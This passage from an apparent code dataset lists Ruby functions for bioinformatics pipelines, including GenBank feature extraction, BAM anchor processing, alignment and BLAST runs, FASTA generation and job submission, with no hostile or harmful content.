fo.puts\"#{gene}\\t.\\t#{featuretype}\\t#{positionss[0]}\\t#{positionss[1]}\\t.\\t#{qual[\"strand\"]}\\t.\\t#{qual[\"interior coding exon\"]}\"\r\n end\r\nend",
"def getFtLocus\n locustag = ARGV[1]\n protId = \"\"\n @gbkObj.each_cds do |ft|\n ftH = ft.to_hash\n ftloc = ft.locations\n if ftH[\"locus_tag\"][0].eql? locustag\n gene = []\n product = []\n gene = ftH[\"gene\"] if !ftH[\"gene\"].nil?\n product = ftH[\"product\"] if !ftH[\"product\"].nil?\n protId = ftH[\"protein_id\"][0] if !ftH[\"protein_id\"].nil?\n locustag = ftH[\"locus_tag\"][0] if !ftH[\"locus_tag\"].nil?\n if ftloc[0].strand == -1\n location = \"c#{ftloc[0].from}..#{ftloc[0].to}\"\n else\n location = \"#{ftloc[0].from}..#{ftloc[0].to}\"\n end\n dna = getDna(ft,@gbkObj.to_biosequence)\n seqout = dna.output_fasta(\"#{@accession}|#{location}|#{protId}|#{locustag}|#{gene[0]}|#{product[0]}\",60)\n puts seqout\n end\n end\n end",
"def getBAMPath()\n bamFile = Dir[\"*_marked.bam\"]\n\n if bamFile == nil || bamFile.length != 1\n return \"none\"\n else\n return Dir.pwd + \"/\" + bamFile[0].to_s\n end\n end",
"def parseReferencePath(output)\n if(output.match(/BUILD_PATH=\\s+[Ss]equence/) ||\n output.match(/BUILD_PATH=[Ss]equence/))\n @refPath = \"sequence\"\n\n elsif(output.match(/BUILD_PATH=\\s+\\/data/) ||\n output.match(/BUILD_PATH=\\/data/))\n @refPath = output.slice(/\\/data\\/slx\\/references\\/\\S+/)\n \n # Since reference paths starting with /data/slx/references represent\n # format of reference paths in alkek, change the prefix of these paths\n # to match the file-system structure in ardmore.\n @refPath.gsub!(/\\/data\\/slx\\/references/,\n \"/stornext/snfs5/next-gen/Illumina/genomes\")\n\n elsif(output.match(/BUILD_PATH=\\s+\\/stornext/) ||\n output.match(/BUILD_PATH=\\/stornext/))\n # If LIMS already has correct path corresponding to the file\n # system structure in ardmore, return that path without any\n # modifications.\n @refPath = output.slice(/\\/stornext\\/\\S+/)\n end\n end",
"def seed_extension(input_hash, anchor_length, read_length, fasta, output_file, mm = 1, max_overhang = read_length + 8)\n\n\t\toutput_hash = {}\n\t\n\t\tinput_hash.each do |chr_a, chromosomes|\n\t\t\t# Load reference\n\t\t\tfasta_file = File.open(\"#{fasta}#{chr_a}.fa\", 'r')\n\t\t\theader = fasta_file.gets.strip\n\t\t\tdna_a = fasta_file.read.gsub(/\\n/, '')\n\n\t\t\tchromosomes.each do |chr_b, anchorpairs|\n\t\t\t fasta_file = File.open(\"#{fasta}#{chr_b}.fa\", 'r')\n \t\t\theader = fasta_file.gets.strip\n \t\t\tdna_b = fasta_file.read.gsub(/\\n/, '')\n\n\t\t\t\t# Loop through hash to extend seeds for each pair\n\t\t\t\tanchorpairs.each do |pair|\n\t\t\t\t\tupstream, downstream = pair\n\t\t\t\t\tqname, mate, read = upstream.id.split('_')[0..2]\n\n\t\t\t\t\tupstream.strand == 1 ? upstream_read = read : upstream_read = Alignment.reverse_complement(read)\n\t\t\t\t\tdownstream.strand == 1 ? downstream_read = read : downstream_read = Alignment.reverse_complement(read)\n\t\t\t\t\t\n\t\t\t\t\tup = dna_a[upstream.start - read_length + anchor_length..upstream.start + anchor_length - 1].upcase\n\t\t\t\t\tdown = dna_b[downstream.start..downstream.start + read_length - 1].upcase\t\n\t\t\t\t\n\t\t\t\t\tif upstream.strand == downstream.strand\n\t\t\t\t\t\tupstream_alignmentlength = Alignment.upstream(upstream_read, up, mm)\n\t\t\t\t\t\tdownstream_alignmentlength = Alignment.downstream(downstream_read, down, mm)\n\t\t\t\t\t\tupstream_breakpoint = upstream.start - upstream_alignmentlength + anchor_length\t\n\t\t\t\t\t\tdownstream_breakpoint = downstream.start + downstream_alignmentlength - 1\n\n\t\t\t\t\telsif upstream.strand == 1 && downstream.strand == -1\n\t\t\t\t\t\tdown = dna_b[downstream.start - read_length + anchor_length..downstream.start + anchor_length - 1].upcase\n\t\t\t\t\t\tupstream_alignmentlength = Alignment.upstream(upstream_read, up, mm)\n\t\t\t\t\t\tdownstream_alignmentlength = Alignment.upstream(downstream_read, down, mm)\n\t\t\t\t\t\tupstream_breakpoint = upstream.start - upstream_alignmentlength + anchor_length\t\n\t\t\t\t\t\tdownstream_breakpoint = downstream.start - downstream_alignmentlength + anchor_length\t\n\t\t\t\t\n\t\t\t\t\telse\n\t\t\t\t\t\tup = dna_a[upstream.start..upstream.start + read_length - 1].upcase\t\n\t\t\t\t\t\tupstream_alignmentlength = Alignment.downstream(upstream_read, up, mm)\n\t\t\t\t\t\tdownstream_alignmentlength = Alignment.downstream(downstream_read, down, mm)\n\t\t\t\t\t\tupstream_breakpoint = upstream.start + upstream_alignmentlength - 1\n\t\t\t\t\t\tdownstream_breakpoint = downstream.start + downstream_alignmentlength - 1\n\t\t\t\t\tend\n\n\t\t\t\t\ttotal_alignmentlength = upstream_alignmentlength + downstream_alignmentlength\n\n\t\t\t\t\tif total_alignmentlength >= read_length && total_alignmentlength <= max_overhang\n\t\t\t\t\t\toverhang = total_alignmentlength - read_length\n\t\n\t\t\t\t\t\tqname = qname.to_sym\n\t\t\t\t\t\tsummary = [chr_a, upstream_breakpoint, upstream.strand, chr_b, downstream_breakpoint, downstream.strand, total_alignmentlength, mate] \n\t\t\t\t\t\t# Candidates for which both, R1 and R2, are present are deleted\n\t\t\t\t\t\t# One read can neither fall on two different non-canonical nor the same junction\n\t\t\t\t\t\tif !output_hash.has_key?(qname)\n\t\t\t\t\t\t\toutput_hash[qname] = summary\n\t\t\t\t\t\telse\n\t\t\t\t\t\t\toutput_hash.delete(qname)\n\t\t\t\t\t\tend\n\t\t\t\t\tend\n\t\t\t\tend\n\t\t\tend\n\t\tend\n\n\t\tFile.open(output_file, 'w') do |output|\n\t\t\toutput_hash.each do |qname, v| \n\t\t\t\toutput.puts 
[\"#{qname.to_s}/#{v[-1]}\", v[0..-2]].join(\"\\t\") if (v[2] - v[1]).abs >= read_length\n\t\t\tend\n\t\tend\n\t\t$logfile.puts \"#{Time.new.strftime(\"%c\")}: Seed extension succeded.\"\n\tend",
"def before_perform\n @outdir = job.job_dir.to_s\n @basename = File.join(job.job_dir, job.jobid)\n @infile = @basename+\".in\" \n # still has to be generated\n @outfile = @basename+\".frags\"\n params_to_file(@infile, 'sequence_input', 'sequence_file')\n @informat = params['informat'] ? params['informat'] : 'fas'\n @predict_ta = params['ta']\n reformat(@informat, \"fas\", @infile)\n @commands = []\n \n \n end",
"def genome(liszt)\n=begin\n[samopen] SAM header is present: 2 sequences\n7621912 reads; of these:\n 4009241 (52.60%) were paired; of these:\n 1983557 (49.47%) aligned concordantly 0 times\n 1818685 (45.36%) aligned concordantly exactly 1 time\n 206999 (5.16%) aligned concordantly >1 times\n ----\n 1983557 pairs aligned concordantly 0 times; of these:\n 409503 (20.64%) aligned discordantly 1 time\n ----\n 1574054 pairs aligned 0 times concordantly or discordantly; of these:\n 3148108 mates make up the pairs; of these:\n 1009275 (32.06%) aligned 0 times\n 35392 (1.12%) aligned exactly 1 time\n 2103441 (66.82%) aligned >1 times\n 3612671 (47.40%) were unpaired; of these:\n 498719 (13.80%) aligned 0 times\n 2246121 (62.17%) aligned exactly 1 time\n 867831 (24.02%) aligned >1 times\n=end\n #puts(liszt);exit\n dict={}; liszt.shift\n dict[\"total\"]=liszt.shift.split[0]; #liszt.shift\n dict[\"paired\"]=liszt.shift.split[0]; liszt.shift #conc 0\n dict[\"conc_once\"]=liszt.shift.split[0]\n dict[\"conc_mult\"]=liszt.shift.split[0]\n liszt.shift(2); dict[\"disc_once\"]=\"\"; dict[\"disc_mult\"]=\"\"\n line=liszt.shift\n line.include?(\">1 times\") ? dict[\"disc_mult\"]=line.split[0] : dict[\"disc_once\"]=line.split[0]\n liszt.shift\n dict[\"unaligned_pairs\"]=liszt.shift.split[0]\n liszt.shift\n dict[\"unmates\"]=liszt.shift.split[0] #unaligned mates\n dict[\"mate_once\"]=liszt.shift.split[0]\n dict[\"mate_mult\"]=liszt.shift.split[0]\n dict[\"unpaired\"]=liszt.shift.split[0]\n dict[\"unpair_unaligned\"]=liszt.shift.split[0]\n dict[\"unpair_once\"]=liszt.shift.split[0]\n dict[\"unpair_mult\"]=liszt.shift.split[0]\n dict\nend",
"def bulk_2(opts)\n raise BFRToolsException.new(\"Missing path for bulk 2\") if opts[:path] == nil\n path = Pathname.new(opts[:path])\n raise BFRToolsException.new(\"Unable to open #{path}\") unless path.readable? or path.directory? \n\n @bulk_2_name = opts[:name] ? opts[:name] : path.basename(\".bam\")\n @bulk_2_sam = Bio::DB::Sam.new({:fasta=>@reference_path, :bam=>path})\n @bulk_2_path = path\n end",
"def generate_pid_fasta_file(dir=\"temp_data\")\n fasta_string=\"\"\n seq = Sequence.get(self.seq_id)\n pids = PercentIdentity.all(:seq1_id => self.seq_id, :percent_id.gte => 20, :order =>[:percent_id.desc],:unique=>true)\n fasta_string= Alignment.first(:alignment_name => self.alignment_name, :seq_id=>self.seq_id).fasta_alignment_string\n puts seq.abrev_name+\":\"+pids.count.to_s\n puts pids.map{|p| p.seq2_sequence.seq_name}.join(',')\n pids.each do |pid|\n if pid.seq2_id != seq.seq_id\n print Sequence.get(pid.seq2_id).abrev_name + \":\" + pid.percent_id.to_s + \",\"\n fasta_string = fasta_string + Alignment.first(:alignment_name=>pid.alignment_name, :seq_id=>pid.seq2_id).fasta_alignment_string(\"pid:#{pid.percent_id}\")\n end\n end\n puts \"\"\n filepath = \"#{dir}/\"+self.alignment_name+\"_\"+seq.abrev_name+\"_pid.fasta\"\n f = File.new(filepath, \"w+\")\n f.write(fasta_string)\n f.close\n filepath\n end",
"def perform\n result_file = nil\n \n # Create the alignment files\n result_file = generate_alignment if @task == :all || @task == :align\n \n # Identify the clusters\n result_file = identify_clusters if @task == :all || @task == :cluster\n \n result_file\n end",
"def getFtsLoc\n location = ARGV[1]\n loc = location.split(\"..\")\n @gb.each_cds do |ft|\n ftH = ft.to_hash\n ftloc = ft.locations\n if ftloc[0].from == loc[0].to_i && ftloc[0].to == loc[1].to_i\n gene = []\n product = []\n gene = ftH[\"gene\"] if !ftH[\"gene\"].nil?\n product = ftH[\"product\"] if !ftH[\"product\"].nil?\n loc = \"c#{location}\" if ftloc[0].strand == -1\n dna = getDna(ft,@gb.to_biosequence)\n seqout = dna.output_fasta(\"#{@accession}|#{loc}|#{ftH[\"protein_id\"][0]}|#{gene[0]}|#{product[0]}|#{@org}\",60)\n puts seqout\n end\n end\nend",
"def blast_permutations! fastas, blast_dbs, cpus=4\n file_permutations = one_way_combinations fastas, blast_dbs, true\n file_permutations = file_permutations.select do |f1, f2|\n genome_from_fname(f1) != genome_from_fname(f2)\n end\n\n first_files = file_permutations.map(&:first)\n second_files = file_permutations.map(&:last)\n\n first_genomes = first_files.map do |fname|\n ary = fname.split(\".\")\n ary.take(ary.length - 1).join\n end\n\n second_genomes = second_files.map do |fname|\n ary = fname.split(BLAST_DB_SEPARATOR).take(1)\n AbortIf.abort_unless ary.length == 1,\n \"Bad file name for #{fname}\"\n\n ary = ary.first.split(\".\")\n\n File.basename ary.take(ary.length - 1).join\n end\n\n outf_names = first_genomes.zip(second_genomes).map do |f1, f2|\n \"#{f1}____#{f2}.aai_blastp\"\n end\n\n args = first_files.length.times.map do |idx|\n [first_files[idx], second_files[idx], outf_names[idx]]\n end\n\n Parallel.each(args, in_processes: cpus) do |infiles|\n query = infiles[0]\n db = infiles[1]\n out = infiles[2]\n\n cmd = \"diamond blastp --threads 1 --outfmt 6 \" +\n \"--query #{query} --db #{db} --out #{out} \" +\n \"--evalue #{EVALUE_CUTOFF}\"\n\n Process.run_and_time_it! \"Diamond blast\", cmd\n end\n\n outf_names\n end",
"def scan_gene_blo_seqs\n GeneBloSeq.destroy_all\n\n genes = Gene.find(:all)\n\n genes.each { |gn|\n\n #assemble gene file location\n gene_blo_runs_f = \"#{AppConfig.gene_blo_runs_dir}/#{gn.name}.fasta\"\n gene_blo_seqs_f = \"#{AppConfig.gene_blo_seqs_dir}/#{gn.name}.fasta\"\n gene_blo_seqs_p = \"#{AppConfig.gene_blo_seqs_dir}/#{gn.name}.phy\"\n\n \n gene_blo_runs_oa = @ud.fastafile_to_original_alignment(gene_blo_runs_f)\n gene_blo_seqs_oa = Bio::Alignment::OriginalAlignment.new\n\n\n\n puts \"gn.seqs_orig_nb:#{gn.seqs_orig_nb} oa_size: #{gene_blo_runs_oa.size}\"\n\n #schould be equal\n #should insert assertion here or make an rspec to detect source\n #puts oa.keys\n\n gene_blo_runs_oa.each_pair { |key, seq|\n puts key, seq\n gbs = GeneBloSeq.new\n #find corresponding gi\n ns = NcbiSeq.find_by_vers_access(key)\n #link to objects gene and gi\n gbs.gene = gn\n gbs.ncbi_seq = ns\n gbs.save\n gene_blo_seqs_oa.add_seq(seq,ns.id)\n\n }\n \n #save fasta file \n @ud.string_to_file(gene_blo_seqs_oa.output(:fasta),gene_blo_seqs_f)\n #save phylip file\n @ud.string_to_file(gene_blo_seqs_oa.output(:phylip),gene_blo_seqs_p)\n\n\n\n\n }\n\n end",
"def rich_sequence_to_fasta(path_to_sequence, output_sequence)\n require 'tempfile'\n sequence_format = guess_sequence_format(path_to_sequence)\n case sequence_format\n when :genbank\n rich_sequence_object = Bio::FlatFile.open(Bio::GenBank, path_to_sequence).first\n when :embl\n rich_sequence_object = Bio::FlatFile.open(Bio::EMBL, path_to_sequence).first\n end\n biosequence = rich_sequence_object.to_biosequence\n \n case output_sequence\n when String\n file_from_biosequence(output_sequence, :fasta, biosequence)\n when Tempfile\n file_from_biosequence(output_sequence.path, :fasta, biosequence)\n end\nend",
"def process_bam(input_file, fasta, skip)\n\n\t\t# general settings\n\t\texclude = []\n\t\tFile.open(skip, 'r').readlines.each {|line| exclude << line.strip}\n\t\tfirstline = TRUE \n\t\tanchor_left = nil\n\t\tanchor_right = nil\n\t\tchr_a = nil\n\t\tchr_b = nil\n\t\tinput_hash = {}\n\n\t\t# Initiate chromosome hash\n\t\tDir.foreach(fasta) do |item|\n\t\t\tchr = item.sub('.fa', '')\n\t\t\tnext if item == '.' || item == '..' || exclude.include?(chr) \n\t\t\tinput_hash[chr] = {}\n\t\tend\n\n\t\tinput_hash.each_key do |chr_a|\n\t\t\tinput_hash.keys.each {|chr_b| input_hash[chr_a][chr_b] = []}\n\t\tend\n\n\t\t# read bam file\n\t\tinput_file.each do |line|\n\t\t\tline = line.strip.split(/\\s+/)\n\t\t\n\t\t\tif firstline \n\t\t\t\tanchor_left = ReadBam.new(line)\n\t\t\t\tfirstline = FALSE\n\t\t\t\tchr_a = anchor_left.chr\n\t\t\telse\n\t\t\t\tanchor_right = ReadBam.new(line)\n\t\t\t\tchr_b = anchor_right.chr\n\t\t\t\t\n\t\t\t\tif input_hash.has_key?(chr_a) && interChimeric?(anchor_left, anchor_right, exclude)\n\t\t\t\t\t\n\t\t\t\t\tif anchor_left.strand == 1 && anchor_right.strand == 1\n\t\t\t\t\t\tinput_hash[chr_b][chr_a] << [anchor_right, anchor_left] \n\t\t\t\t\telsif anchor_left.strand == -1 && anchor_right.strand == -1\n\t\t\t\t\t\tinput_hash[chr_a][chr_b] << [anchor_left, anchor_right] \n\t\t\t\t\telse\n\t\t\t\t\t\tinput_hash[chr_b][chr_a] << [anchor_right, anchor_left] \n\t\t\t\t\tend\n\t\t\t\tend\n\t\t\t\t\n\t\t\t\tanchor_left, anchor_right = nil\n\t\t\t\tfirstline = TRUE\n\t\t\tend\n\t\tend\n\t\t$logfile.puts \"#{Time.new.strftime(\"%c\")}: Found anchor pairs.\"\t\t\n\t\tinput_hash\n\tend",
"def output_expectations_resource_ref(data)\n rref_name = \"#{data[:kind]}_#{data[:resourceref][:name]}\"\n rref_file = [data[:resourceref][:name].tr('_', ''),\n data[:resourceref][:imports]].join('_')\n\n output_file \"blah/lib/puppet/type/#{rref_name}.rb\",\n data[:resourceref][:writer]\n output_file \"blah/lib/puppet/provider/#{rref_name}/google.rb\",\n data[:resourceref][:writer]\n output_file \"blah/spec/#{rref_name}_provider_spec.rb\",\n data[:resourceref][:writer]\n\n output_file [\"blah/lib/google/#{data[:kind][1..-1]}/property/\",\n \"#{rref_file}.rb\"].join,\n data[:resourceref][:writer]\n\n 3.times.each do |id|\n %w[name title].each do |title|\n output_file ['blah/spec/data/network',\n \"#{rref_name}/success#{id + 1}~#{title}.yaml\"].join('/'),\n data[:resourceref][:writer]\n end\n end\n end",
"def run_pasv_cli\n exit_status = nil\n # We need an outdir. The PASV CLI creates this dir so we can't create a tmpdir. Best we can do is try to give it a unique name.\n #\n # %24N yoctosecond (24 digits)\n date_fmt = \"%Y_%m_%d_%H_%M_%S_%L_%24N\"\n\n outdir = nil\n # Keep looping until you get a dirname that doesn't currently exist.\n loop do\n time = Time.new.strftime date_fmt\n token = SecureRandom.hex(64)\n\n # The chances of making a duplicate here from some other thread or OS operation should be LOW\n outdir = File.join Dir.tmpdir, \"#{token}_#{time}\"\n\n break unless Dir.exist? outdir\n end\n\n\n\n # First we need to write the files to some Tempfile\n # fsync\n\n\n # defaults\n\n if self.aligner == \"clustalo\"\n aln_params = '\\--threads 1'\n io_format_str = '\\-i %s \\-o %s'\n elsif self.aligner == \"mafft\"\n aln_params = '\\--thread 1 \\--quiet'\n io_format_str = '%s > %s'\n end\n\n p [aln_params, io_format_str]\n\n Tempfile.open do |ref_f|\n self.ref_file.download do |data|\n ref_f.puts data\n end\n\n # Ensure the data is actually written to file now.\n ref_f.fsync\n\n Tempfile.open do |query_f|\n self.query_file.download do |data|\n query_f.puts data\n end\n\n query_f.fsync\n\n # And now we build the PASV command while the tempfiles are still in scope.\n cmd = \"ruby #{PasvsHelper::PASV_EXE} --refs #{ref_f.path} --queries #{query_f.path} --aligner #{self.aligner} --alignment-parameters '#{aln_params}' --io-format-string '#{io_format_str}' --start #{self.roi_start} --end #{self.roi_end} --threads #{PasvsHelper::THREADS} --outdir #{outdir} --min-count #{PasvsHelper::MIN_COUNT} 500 501\"\n\n puts \"Command will be: #{cmd}\"\n\n PasvsHelper::RyaTime.time_it cmd, Rya::AbortIf.logger do\n exit_status = PasvsHelper::RyaProcess.run_it cmd\n end\n end\n end\n\n # If the exit_status is zero, we need to zip up the tmp folder and give it as a download.\n puts exit_status\n\n if exit_status.success?\n outdir\n end\n end",
"def clustal_consensus_multi(seq_hash,open = 15, ext = 6.66, gap_treatment = 1)\n gapopen = open\n gapext = ext\n temp_dir = File.dirname($0)\n temp_file_in = temp_dir + \"/temp_sequence\"\n f = File.open(temp_file_in,'w')\n f.puts seq_hash.flatten\n f.close\n\n temp_file_out = temp_dir + \"/temp_out\"\n temp_screen_out = temp_dir + \"/temp_screen\"\n print `/applications/clustalw2 -infile=#{temp_file_in} -case=upper -outorder=input -output=gde -outfile=#{temp_file_out} >#{temp_screen_out} -gapopen=#{gapopen} -gapext=#{gapext}`\n h = {}\n File.open(temp_file_out,\"r\") do |file|\n n = 0\n file.readlines.each do |line|\n if line =~ /^\\#/\n n += 1\n h[n] = \"\"\n else\n h[n] += line.chomp\n end\n end\n end\n length = h[1].size\n consensus_bases = []\n (0..(length-1)).each do |n|\n bases = []\n h.values.each do |seq|\n bases << seq[n]\n end\n if gap_treatment == 1\n consensus_bases << creat_consensus_base_non_gap(bases)\n else\n consensus_bases << creat_consensus_base_gap(bases)\n end\n end\n File.unlink temp_file_in\n File.unlink temp_file_out\n File.unlink temp_screen_out\n Dir.chdir(temp_dir) do\n Dir.glob(\"*.dnd\") do |dnd|\n File.unlink(dnd)\n end\n end\n consensus_seq = consensus_bases.join('')\nend",
"def compute\n index(@ref, @ref_base, @software, @annotation)\n\n if @err_rate > 0\n bucketized_alignment\n else # software == :star || err_rate == 0\n unbucketized_alignment\n end\n end",
"def cleanup_distances!\n r = get_result(:distances)\n ref = project.datasets.select(&:is_ref?).select(&:is_active?).map(&:name)\n return if r.nil?\n [:haai_db, :aai_db, :ani_db].each do |db_type|\n db = r.file_path(db_type)\n next if db.nil? or not File.size? db\n sqlite_db = SQLite3::Database.new db\n table = db_type[-6..-4]\n val = sqlite_db.execute \"select seq2 from #{table}\"\n next if val.empty?\n (val.map(&:first) - ref).each do |extra|\n sqlite_db.execute \"delete from #{table} where seq2=?\", extra\n end\n end\n end",
"def postscript(ant, build_environment, product_directory, *args)\n return if @no_demo\n\n # first and only argument is a hash\n arg = args[0]\n\n dest = File.join(product_directory.to_s, arg['dest'])\n agent_pattern = arg['agent-pattern']\n provider_pattern = arg['provider-pattern']\n reference_file = arg['reference-file']\n work_dir = File.join(Dir.tmpdir, \"tcbuild-extract\")\n\n # look up the agent jar\n agent_jar = nil\n Dir.chdir(dest) do |path|\n Dir.glob(agent_pattern + \"*.jar\") { |filename|\n agent_jar = File.join(path, filename)\n }\n fail(\"Can't find agent jar with pattern #{agent_pattern}\") unless File.exists?(agent_jar)\n end\n\n # extract provider from agent jar\n ant.unzip(:src => agent_jar, :dest => work_dir) do\n ant.patternset(:includes => \"**/\" + provider_pattern + \"*.jar\")\n end\n\n # look up provider jar\n provider_jar = nil\n Dir.chdir(File.join(work_dir, \"TIMs\")) do |path|\n Dir.glob(provider_pattern + \"*.jar\") { |filename|\n provider_jar = File.join(path, filename)\n }\n fail(\"Can't find provider jar with pattern #{provider_pattern}\") unless File.exists?(provider_jar)\n end\n\n # extract reference-config.xml from provider jar\n ant.unzip(:src => provider_jar, :dest => work_dir) do\n ant.patternset(:includes => reference_file)\n end\n\n ref_path = File.join(work_dir, reference_file)\n fail(\"Reference config is not found #{ref_path}\") unless File.exists?(ref_path)\n \n # copy it over to dest\n FileUtils.cp ref_path, dest\n\n # clean up\n FileUtils.rm_rf(work_dir)\n end",
"def run\n\t\t\t\tstart_flowcell\n\t\t\t\tdistributions = []\n\n\n\t\t\t\tunless @options[:no_distribute]\n\t\t\t\t\tdistributions = @flowcell.external_data.distributions_for @flowcell.id \n\t\t\t\tend\n\n\t\t\t\tsteps = @options[:steps]\n\t\t\t\tlogm \"running steps: #{steps.join(\", \")}\"\n\n\t\t\t\tif steps.include? \"setup\"\n\t\t\t\t\tcopy_sample_sheet\n\t\t\t\tend\n\n\t\t\t\tif steps.include? \"unaligned\"\n\t\t\t\t\t#process_unaligned_reads distributions\n\t\t\t\tend\n\n\t\t\t\tif steps.include?\n\n\n\t\t\tend\n\n\t\t\tdef logm message\n\t\t\t\tlog \"# #{message}\"\n\t\t\t\tSolexaLogger.log(@flowcell.paths.id, message) unless @options[:test]\n\t\t\tend\n\n\t\t\tdef copy_sample_sheet\n\t\t\t\tsource = File.join(@flowcell.paths.base_dir, \"SampleSheet.csv\")\n\t\t\t\tdestination = File.join(@flowcell.paths.unaligned_dir, \"SampleSheet.csv\")\n\t\t\t\tif !File.exists? source\n\t\t\t\t\tputs \"ERROR: cannot find SampleSheet at: #{source}\"\n\t\t\t\tend\n\n\t\t\t\texecute(\"cp #{source} #{destination}\")\n\t\t\tend\n\n\t\t\tdef process_unaligned_reads distributions\n\t\t\t\tstatus \"processing unaligned\"\n\t\t\t\tsteps = @options[:steps]\n\t\t\t\tfastq_groups = group_fastq_files(@flowcell.paths.unalinged_project_dir,\n\t\t\t\t\t @flowcell.paths.fastq_combine_dir)\n\t\t\t\t#unless @options[:only_distribute]\n\t\t\t\t#\tcat files fastq_groups\n\t\t\t\t#end\n\n\t\t\t\t###### LAST STOP\n\n\t\t\tend\n\n\n\t\t\t#\n # Helper method that executes a given string on the command line.\n # This should be used instead of calling system directly, as it also\n # deals with if we are in test mode or not.\n #\n def execute command\n log command\n system(command) unless @options[:test]\n end\n\n\n #\n # Gets grouping data for fastq.gz files\n #\n def group_fastq_files starting_path, output_path, options = {:prefix => \"L\", :suffix => \".fastq.gz\", :exclude_undetermined => true}\n execute \"mkdir -p #{output_path}\"\n fastq_groups = []\n \n fastq_files = Dir.glob(File.join(starting_path, fastq_search_path))\n if fastq_files.empty?\n log \"# ERROR: no fastq files found in #{starting_path}\" if fastq_files.empty?\n else\n log \"# #{fastq_files.size} fastq files found in #{starting_path}\"\n fastq_file_data = get_file_data fastq_files, \"\\.fastq\\.gz\"\n fastq_groups = group_files fastq_file_data, output_path, options\n end\n fastq_groups\n end\n\n #\n # Actually combines the related fastq files\n # using cat.\n #\n def cat_files file_groups\n file_groups.each do |group|\n check_exists(group[:paths])\n # this is the Illumina recommended approach to combining these fastq files.\n # See the Casava 1.8 Users Guide for proof\n files_list = group[:paths].join(\" \")\n command = \"cat #{files_list} > #{group[:path]}\"\n execute command\n end\n end\n\n\n\n #\n # Returns an array of hashes, one for each\n # new combined fastq file to be created\n # Each hash will have the name of the\n # combined fastq file and an Array of\n # paths that the group contains\n #\n def group_files file_data, output_path, options = {:prefix => \"L\", :suffix => \".fastq.gz\", :exclude_undetermined => true}\n\t\t\t\t# alternatively inherit the parent class and call super???? \n\t\t\t\t# super \n\t\t\t\t# \t\n groups = {}\n file_data.each do |data|\n if data[:barcode] == \"Undetermined\" and options[:exclude_undetermined]\n log \"# Undetermined sample lane: #{data[:lane]} - name: #{data[:sample_name]}. Skipping\"\n next\n end\n \n group_key = name_for_data data, options\n \n if groups.include? 
group_key\n if groups[group_key][:sample_name] != data[:sample_name]\n raise \"ERROR: sample names not matching #{group_key} - #{data[:path]}:#{data[:sample_name]}vs#{groups[group_key][:sample_name]}\"\n end\n if groups[group_key][:lane] != data[:lane]\n raise \"ERROR: lanes not matching #{group_key} - #{data[:path]}\"\n end\n groups[group_key][:files] << data\n else\n group_path = File.join(output_path, group_key)\n groups[group_key] = {:group_name => group_key,\n :path => group_path,\n :sample_name => data[:sample_name],\n :read => data[:read],\n :lane => data[:lane],\n :files => [data]\n }\n end\n end\n \n # sort based on read set\n groups.each do |key, group|\n group[:files] = group[:files].sort {|x,y| x[:set] <=> y[:set]}\n group[:paths] = group[:files].collect {|data| data[:path]}\n end\n groups.values\n end\n\n\n\n\tend",
"def reference_file(file, options = {})\n # return @reference_file if @reference_file\n sub_dir = Origen.file_handler.sub_dir_of(file).to_s\n sub_dir = nil if sub_dir == '.'\n filename = options[:output_file_name] || file.basename.to_s.gsub('.erb', '')\n # filename.gsub!('target', $target.id) if filename =~ /target/ && $target.id\n reference = Pathname.new(\"#{reference_directory}#{sub_dir ? '/' + sub_dir : ''}/#{filename}\")\n FileUtils.mkdir_p(reference.dirname.to_s) unless File.exist?(reference.dirname.to_s)\n # @reference_file = reference\n reference\n end",
"def construct_standard_sequence_hyperlink(options)\n if options[:sequence_id].match(/^[^ ]/) #if there is a space right after the '>', makeblastdb was run without -parse_seqids\n # By default, add a link to a fasta file of the sequence (if makeblastdb was called with -parse_seqids)\n complete_id = options[:sequence_id][/^(\\S+)\\s*.*/, 1] # get id part\n id = complete_id.include?('|') ? complete_id.split('|')[1] : complete_id.split('|')[0]\n @all_retrievable_ids ||= []\n @all_retrievable_ids.push(id)\n\n link = \"/get_sequence/?id=#{id}&db=#{options[:databases].join(' ')}\" # several dbs... separate by ' '\n return link\n else\n # do nothing - link == nil means no link will be incorporated\n return nil\n end\n end",
"def all_files_aligned?\n return false unless files.count > 1 # have to be at least 2 files to be aligned\n # for every fa file there is a corresponding afa file\n # means that chopping off the extensions there will be 2 of every file\n #\n # basename('') chops off both the prefix and the suffix provided so\n # /path/to/foo.fa => foo\n (absolute_path.glob('*.fa').map {|f| f.basename('.fa')} - absolute_path.glob('*.afa').map {|f| f.basename('.afa')}).empty?\n end",
"def process_sample(sample_name)\n data = @config[sample_name]\n data.each_with_index do |d,i|\n data[i] = @default_config.merge(d)\n case data[i][:mode]\n when /\\ADNA\\z/i\n if data[i][:bwa_ref] == nil\n @stderr.puts \"Missing bwa reference for #{sample_name}\"\n return 1\n end\n when /\\Arna\\z/i\n if data[i][:star_ref] == nil || data[i][:star_index] == nil\n @stderr.puts \"Missing star reference for #{sample_name}\"\n return 1\n end\n else\n @stderr.puts \"Missing analysis mode for #{sample_name}\"\n return 1\n end\n end\n if @options.debug\n puts data.inspect\n puts \"\"\n #exit 0\n puts Template.analysis_template(@default_config,sample_name,data)\n if (data.first.has_key?(:keep_unaligned) && data.first[:keep_unaligned]) then\n puts UnalignedExtractTemplate.new(@default_config,sample_name,data)\n end\n return 0\n end\n output_dir = File.join(@options.output_base,sample_name)\n\n unless Dir.mkdir(output_dir)\n @stderr.puts \"Failed to make dir: #{output_dir} for #{sample_name}\"\n return 1\n end\n\n script_file = File.join(output_dir,\"analyze.sh\")\n File.open(script_file,\"w\") do |f|\n f.puts Template.analysis_template(@default_config,sample_name,data)\n end\n\n if (data.first.has_key?(:keep_unaligned) && data.first[:keep_unaligned]) then\n extract_script_file = File.join(output_dir,\"extract_unaligned.sh\")\n File.open(extract_script_file,\"w\") do |f|\n f.puts UnalignedExtractTemplate.new(@default_config,sample_name,data)\n end\n end\n\n return_dir = Dir.pwd\n unless Dir.chdir(output_dir)\n @stderr.puts \"Failed to change to dir: #{output_dir} for #{sample_name}\"\n return 1\n end\n\n Dir.mkdir(\"logs\")\n\n # We sleep a random amount to avoid overloading SGE with a billion jobs right away\n sleep(rand(@options.delay))\n cmd = %W(sbatch) + @options.scheduler_opts.split(/ /) + %W(-o logs/slurm-%x.%A.log -W - t 0-23 -N 1 -c 1 --mem 4 -J a_#{sample_name}_full ./analyze.sh)\n cmd = %w(./analyze.sh) if @options.run_local\n @stdout.puts(cmd.join(\" \"))\n system(*cmd)\n status = $?.exitstatus\n\n Dir.chdir(return_dir)\n return status\nend",
